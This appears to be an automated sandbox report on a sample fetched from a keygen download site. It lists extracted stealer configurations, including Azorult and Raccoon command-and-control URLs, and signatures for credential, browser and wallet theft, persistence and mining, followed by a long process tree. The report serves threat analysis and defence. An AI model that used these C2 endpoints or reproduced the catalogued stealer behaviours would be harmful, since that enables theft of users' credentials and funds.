Resubmissions

17-04-2021 18:41

210417-4m6sdqyqx2 10

17-04-2021 06:29

210417-mvqz54c7re 10

16-04-2021 14:15

210416-aa5qqagyce 10

Analysis

  • max time kernel
    1794s
  • max time network
    1750s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    17-04-2021 06:29

General

  • Target

    https://keygenit.com/d/a941ad21e610ns219454.html

  • Sample

    210417-mvqz54c7re

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1056
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2684
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2892
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          PID:2676
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/a941ad21e610ns219454.html
          1⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:696
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff898c54f50,0x7ff898c54f60,0x7ff898c54f70
            2⤵
              PID:3088
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:2
              2⤵
                PID:668
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1088 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:572
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 /prefetch:8
                2⤵
                  PID:1536
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2936 /prefetch:1
                  2⤵
                    PID:2128
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:1
                    2⤵
                      PID:1008
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
                      2⤵
                        PID:576
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
                        2⤵
                          PID:2340
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
                          2⤵
                            PID:2720
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
                            2⤵
                              PID:496
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:8
                              2⤵
                                PID:4116
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4452
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6468 /prefetch:8
                                2⤵
                                  PID:4668
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6584 /prefetch:8
                                  2⤵
                                    PID:4720
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6800 /prefetch:8
                                    2⤵
                                      PID:4740
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6760 /prefetch:8
                                      2⤵
                                        PID:4776
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6908 /prefetch:8
                                        2⤵
                                          PID:4836
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6640 /prefetch:8
                                          2⤵
                                            PID:4848
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7296 /prefetch:8
                                            2⤵
                                              PID:4880
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7440 /prefetch:8
                                              2⤵
                                                PID:4916
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7552 /prefetch:8
                                                2⤵
                                                  PID:4984
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7540 /prefetch:8
                                                  2⤵
                                                    PID:4996
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                    2⤵
                                                      PID:5056
                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff627fba890,0x7ff627fba8a0,0x7ff627fba8b0
                                                        3⤵
                                                          PID:5076
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2172
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7448 /prefetch:8
                                                        2⤵
                                                          PID:4320
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5944 /prefetch:8
                                                          2⤵
                                                            PID:4120
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7780 /prefetch:8
                                                            2⤵
                                                              PID:4336
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7644 /prefetch:8
                                                              2⤵
                                                                PID:4476
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7608 /prefetch:8
                                                                2⤵
                                                                  PID:4496
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7816 /prefetch:8
                                                                  2⤵
                                                                    PID:2088
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6692 /prefetch:8
                                                                    2⤵
                                                                      PID:4752
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5488 /prefetch:8
                                                                      2⤵
                                                                        PID:4860
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:8
                                                                        2⤵
                                                                          PID:4784
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:8
                                                                          2⤵
                                                                            PID:2200
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5356 /prefetch:8
                                                                            2⤵
                                                                              PID:5004
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
                                                                              2⤵
                                                                                PID:4792
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4984 /prefetch:8
                                                                                2⤵
                                                                                  PID:4900
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7868 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4972
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8016 /prefetch:8
                                                                                    2⤵
                                                                                      PID:5016
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8156 /prefetch:8
                                                                                      2⤵
                                                                                        PID:5068
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7160 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4480
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6848 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4888
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8236 /prefetch:8
                                                                                            2⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4472
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8288 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4876
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8396 /prefetch:8
                                                                                              2⤵
                                                                                                PID:1420
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8532 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1900
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8544 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4724
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8560 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4996
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8588 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4456
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8608 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4832
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8580 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5152
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8576 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4672
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8400 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5244
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5304
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9328 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5376
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8696 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5444
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9140 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5564
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5696
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9380 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5736
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,3098682829866904271,3712083489436408042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:1476
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                      1⤵
                                                                                                                        PID:2484
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2460
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                        1⤵
                                                                                                                          PID:1912
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                          1⤵
                                                                                                                            PID:1408
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                            1⤵
                                                                                                                              PID:1244
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                              1⤵
                                                                                                                                PID:1188
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:912
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:340
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
